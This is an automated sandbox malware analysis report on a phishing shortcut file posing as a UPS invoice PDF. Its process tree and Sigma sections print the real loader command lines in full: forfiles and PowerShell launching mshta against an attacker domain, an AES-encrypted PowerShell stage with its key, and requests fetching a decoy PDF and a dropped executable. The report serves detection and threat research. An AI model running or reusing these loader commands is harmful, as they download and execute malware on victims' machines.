Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice-UPS-218931.pdf.lnk.mal.lnk

Overview

General Information

Sample name:Invoice-UPS-218931.pdf.lnk.mal.lnk
Analysis ID:1466029
MD5:de45594e6e0700cd245eb48167b4d576
SHA1:7903bc25f029d194a31783adb0c26cc461ac2ef2
SHA256:d187de197e79e51a82eb727809d5fb6847c75104979ec9622429c2e74b55db5f
Tags:lnk
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 4936 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6336 cmdline: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 4996 cmdline: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 4620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB = [System.Security.Cryptography.Aes]::Create();$fcuYB.Key = FwbFg('615241616D494A7A70714B63736F6771');$fcuYB.IV = New-Object byte[] 16;$uIvTQuuE = $fcuYB.CreateDecryptor();$TRZjYlWGC = $uIvTQuuE.TransformFinalBlock($JMNVEMgx, 0, $JMNVEMgx.Length);$xbgxJDMGJ = [System.Text.Encoding]::Utf8.GetString($TRZjYlWGC);$uIvTQuuE.Dispose();& $xbgxJDMGJ.Substring(0,3) $xbgxJDMGJ.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 5352 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7384 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7540 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • putty.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: 5EFEF6CC9CD24BAEEED71C1107FC32DF)
  • svchost.exe (PID: 1996 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4620INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2361d7:$b1: ::WriteAllBytes(
  • 0x236dd5:$b1: ::WriteAllBytes(
  • 0xb3145:$s1: -join
  • 0xb558b:$s1: -join
  • 0x114511:$s1: -join
  • 0x1215e6:$s1: -join
  • 0x1249b8:$s1: -join
  • 0x12506a:$s1: -join
  • 0x126b5b:$s1: -join
  • 0x128d61:$s1: -join
  • 0x129588:$s1: -join
  • 0x129df8:$s1: -join
  • 0x12a533:$s1: -join
  • 0x12a565:$s1: -join
  • 0x12a5ad:$s1: -join
  • 0x12a5cc:$s1: -join
  • 0x12ae1c:$s1: -join
  • 0x12af98:$s1: -join
  • 0x12b010:$s1: -join
  • 0x12b0a3:$s1: -join
  • 0x12b309:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6336, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ProcessId: 4996, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB = [System.Security.Cryptography.Aes]::Creat
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB = [System.Security.Cryptography.Aes]::Creat
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4620, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 4936, ParentProcessName: forfiles.exe, ProcessCommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ProcessId: 6336, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1996, ProcessName: svchost.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageAvira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...Avira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage.Avira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/IAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Invoice-UPS-218931.pdf.lnk.mal.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780501830.0000023F9E075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780052517.0000023F9E0D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793809350.0000023F9E076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780480215.0000023F9A1E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: Binary string: .pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678633F40 FindFirstFileA,FindClose,12_2_00007FF678633F40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678626B00 GetProcAddress,FindFirstFileA,CloseHandle,12_2_00007FF678626B00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678632190 FindFirstFileA,FindClose,FindWindowA,12_2_00007FF678632190
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678600520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,12_2_00007FF678600520
Source: global trafficHTTP traffic detected: GET /cdnusa/upsinvoice.pdf HTTP/1.1Host: nebulaquestcorporation.ccConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdnusa/putty.exe HTTP/1.1Host: nebulaquestcorporation.cc
Source: Joe Sandbox ViewIP Address: 104.77.220.172 104.77.220.172
Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /cdnusa/invoiceupsstage HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nebulaquestcorporation.ccConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678610DE0 recv,12_2_00007FF678610DE0
Source: global trafficHTTP traffic detected: GET /cdnusa/invoiceupsstage HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nebulaquestcorporation.ccConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdnusa/upsinvoice.pdf HTTP/1.1Host: nebulaquestcorporation.ccConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdnusa/putty.exe HTTP/1.1Host: nebulaquestcorporation.cc
